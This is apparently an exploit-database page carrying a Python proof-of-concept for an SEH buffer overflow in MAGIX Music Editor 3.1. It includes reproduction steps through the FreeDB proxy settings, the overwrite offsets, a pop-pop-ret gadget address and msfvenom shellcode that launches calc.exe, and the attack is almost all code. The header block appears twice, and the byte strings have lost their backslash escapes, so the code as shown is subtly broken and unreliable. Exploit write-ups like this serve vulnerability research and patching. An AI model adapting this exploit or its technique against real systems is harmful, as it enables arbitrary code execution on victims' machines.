Category: Vulnerabilities
Hits: 344
Exploit Title: MAGIX Music Editor 3.1 - Buffer Overflow (SEH)
# Exploit Author: bzyo
# Twitter: @bzyo_
# Date: 2018-12-24
# Vulnerable Software: MAGIX Music Editor 3.1
# Exploit Title: MAGIX Music Editor 3.1 - Buffer Overflow (SEH)
# Exploit Author: bzyo
# Twitter: @bzyo_
# Date: 2018-12-24
# Vulnerable Software: MAGIX Music Editor 3.1
# Vendor Homepage: https://www.magix.com/us/
# Version: 3.1
# Software Link: https://www.magix.com/us/music/mp3-deluxe/
# Music Editor Software is bundled with MP3 Deluxe 19
# Tested Windows 7 SP1 x86

# PoC
# 1. run script
# 2. open music editor 3
# 3. go to CD > freedb options > FreeDB Proxy Options
# 4. copy/paste magix.txt contents into Server field
# 5. select Accept settings
# 6. pop calc

#!/usr/bin/python

filename="magix.txt"

#lol
junk = "A"*420

#jump 6
nseh = "xebx06xccxcc"

#0x10015b08 : pop ecx # pop ecx # ret | ascii {PAGE_EXECUTE_READ} [dac3x.dll]
seh = "x08x5bx01x10"

#msfvenom -a x86 -p windows/exec CMD=calc.exe -b "x00" -e x86/alpha_mixed -f c
#Payload size: 447 bytes
calc = ("xdaxd4xd9x74x24xf4x5bx53x59x49x49x49x49x49x49"
"x49x49x49x43x43x43x43x43x43x43x37x51x5ax6ax41"
"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42"
"x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x4b"
"x4cx4bx58x4bx32x67x70x55x50x45x50x45x30x6ex69"
"x6bx55x54x71x49x50x65x34x6cx4bx72x70x70x30x6e"
"x6bx76x32x46x6cx6cx4bx43x62x65x44x4ex6bx50x72"
"x64x68x66x6fx58x37x52x6ax31x36x45x61x4bx4fx6e"
"x4cx67x4cx43x51x61x6cx75x52x34x6cx51x30x6bx71"
"x7ax6fx56x6dx45x51x78x47x7ax42x4cx32x56x32x56"
"x37x6ex6bx32x72x42x30x4ex6bx32x6ax37x4cx6cx4b"
"x72x6cx67x61x61x68x4ax43x30x48x73x31x6bx61x66"
"x31x6ex6bx43x69x57x50x46x61x5ax73x4cx4bx51x59"
"x42x38x4dx33x37x4ax30x49x6ex6bx46x54x6cx4bx76"
"x61x68x56x65x61x4bx4fx4cx6cx5ax61x78x4fx56x6d"
"x56x61x58x47x65x68x4bx50x53x45x48x76x37x73x71"
"x6dx78x78x55x6bx31x6dx44x64x64x35x59x74x72x78"
"x4cx4bx31x48x66x44x36x61x6ax73x70x66x6ex6bx74"
"x4cx42x6bx6ex6bx46x38x57x6cx36x61x38x53x6cx4b"
"x64x44x6cx4bx46x61x5ax70x6dx59x32x64x61x34x46"
"x44x53x6bx61x4bx63x51x36x39x31x4ax52x71x69x6f"
"x4bx50x71x4fx61x4fx70x5ax6ex6bx66x72x78x6bx6c"
"x4dx31x4dx31x7ax43x31x4ex6dx4bx35x68x32x47x70"
"x65x50x65x50x36x30x62x48x54x71x4cx4bx42x4fx4f"
"x77x59x6fx4ex35x4dx6bx68x70x68x35x4dx72x52x76"
"x30x68x4ex46x5ax35x4dx6dx6fx6dx59x6fx4ax75x35"
"x6cx46x66x73x4cx75x5ax4dx50x69x6bx79x70x51x65"
"x76x65x6fx4bx33x77x74x53x31x62x70x6fx73x5ax33"
"x30x76x33x39x6fx58x55x30x63x75x31x52x4cx73x53"
"x36x4ex52x45x53x48x32x45x65x50x41x41")

fill = "C"*2000

buffer = junk + nseh + seh + calc + fill

textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()